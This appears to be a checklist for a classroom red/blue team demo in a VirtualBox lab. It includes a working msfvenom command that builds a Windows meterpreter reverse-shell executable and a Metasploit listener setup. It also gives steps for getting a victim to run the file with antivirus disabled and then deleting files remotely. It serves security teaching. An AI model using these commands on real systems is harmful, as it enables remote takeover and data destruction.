Super Demo Presentation 1
Presentation Checklist
- SuperDemo Discussion (Phil, Dan)
- Development environment
- VirtualBox
- Network (internal)
- BLUE: Win10 VM (ipconfig, ping)
- BLUE: Create “Important New Document.txt”
- RED: Kali VM
- RED: Create EXPLOIT (paste)
- RED: Set up meterpreter (paste)
- Share in lieu of email
- RED: Drop EXPLOIT on the share
- BLUE: Turn OFF virus
- BLUE: Drag EXPLOIT to Desktop
- BLUE: Double-Click (execute) EXPLOIT
- RED: Meterpreter AWAKENS
- RED: dir, ps, sysinfo, ps | grep explorer
- RED: migrate [explorer ID]
- RED: Delete “Important New Document.txt”
- BLUE: “Important New Document.txt” GONE!
- RED: Delete “EXPLOIT.exe”
- BLUE: “EXPLOIT.exe” GONE!
- BLUE: NOTHING in Recycle Bin!
- RED: Quit LISTENER
- DISCUSSION - What is PURPLE to do…
Presentation Code
EXPLOIT
msfvenom \
-p windows/meterpreter/reverse_tcp \
LHOST=192.168.128.13 \
LPORT=4444 \
-f exe \
-o ~/Desktop/EXPLOIT.exe
LISTENER
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.128.13
set LPORT 4444
show options